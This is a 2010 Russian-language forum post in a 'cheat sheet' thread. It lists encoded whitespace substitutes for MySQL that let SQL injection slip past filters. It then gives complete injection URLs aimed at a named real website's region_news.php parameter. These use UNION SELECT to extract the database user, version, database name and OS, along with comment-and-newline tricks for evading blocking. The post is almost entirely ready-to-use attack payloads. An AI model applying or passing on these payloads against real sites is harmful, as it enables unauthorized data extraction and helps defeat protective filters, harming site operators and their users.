Тема: Шпаргалка
Показать сообщение отдельно
Старый 15.07.2010, 22:10   #9
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Варианты пробелов в MySQL (извращенская версия)

plain text
%09, %0a, %0b, %0c, %0d, %20, %a0, /**/, +, %23%0a, --%0a

utf8_decode
%c0%09
%c0%0a
%c0%0b
%c0%0c
%c0%0d
%c0%20
%c0%49
%c0%4a
%c0%4b
%c0%4c
%c0%4d
%c0%60
%c0%89
%c0%8a
%c0%8b
%c0%8c
%c0%8d
%c0%a0
%c0%c9
%c0%ca
%c0%cb
%c0%cc
%c0%cd
%c0%e0
%e0%00%09
%e0%40%09
%e0%80%09

urldecode
%2b


Ну и, собственно, из некоторых идей вытекают новые варианты обходов фильтров.

Пример из темы sql-inj:
Код:
http://www.asf.ca/region_news.php?id=1+union+select+concat_ws%280x3a,111,user%28%29,version%28%29,database%28%29,@@version_compile_os%29--

блокируется

http://www.asf.ca/region_news.php?id=1+/*!union*/+/*!select*/+concat_ws%280x3a,111,user%28%29,version%28%29,database%28%29,@@version_compile_os%29--

прием, ставший уже стандартным

http://www.asf.ca/region_news.php?id=1%23/*%0aunion+select+concat_ws%280x3a,111,user%28%29,version%28%29,database%28%29,@@version_compile_os%29--
http://www.asf.ca/region_news.php?id=1--/*%0aunion+select+concat_ws%280x3a,111,user%28%29,version%28%29,database%28%29,@@version_compile_os%29--

и новые вариации
PS: хехе, написал и понял, где-то я это уже видел) "Тернистый путь багоискателя" от Elekt за 2008 год... Странно что способ не прижился)

PPS: %a0 aka "неразрывный пробел" работает не всегда, почему именно, пока затрудняюсь сказать
BlackFan вне форума   Ответить с цитированием